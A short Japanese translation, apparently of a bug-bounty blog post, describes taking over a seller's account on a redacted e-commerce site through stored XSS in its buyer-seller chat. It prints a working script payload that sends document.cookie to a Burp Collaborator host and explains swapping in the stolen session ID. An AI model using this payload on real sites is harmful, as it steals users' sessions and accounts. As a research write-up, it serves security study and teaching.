XSS - Weaponization ATO から学ぶ

ソース:

medium.com

脆弱性XSS

 

訳:

捜査対象となっているのは、買い手と売り手の両方が関与する電子商取引ウェブサイトのプライベートプログラムだ。
機密保持のため、このブログではこのプラットフォームをwww.redacted.comと呼びます。 

 

調査を開始するために、最初に 2 つのアカウントを作成し。
1 つは購入者として指定され、もう 1 つは販売者として指定されました。
その後、Web サイトを系統的に調査し、各入力フィールドを精査して。
このプロセス中に、購入者が販売者とチャットできるようにする特定の機能を特定し。
私はすぐにブラインド XSS ペイロードを販売者のアカウントに送信し始め。 

 

チャット機能

 

 

ATO XSS ペイロード

 

 

<script>new Image().src="http://burp.collaborator/abc.php?output="+document.cookie;</script>

 

Burp-Collaborator

トークンを取得した後の最初のステップは、攻撃者としてログインすることでした。
Firefox の要素検査機能を利用して、自分のセッション ID を被害者のものに置き換え、ページを更新しました。
このアクションにより、私は被害者のアカウントにシームレスにログインし、セッションの乗っ取りが成功しました。

 

ほなほな。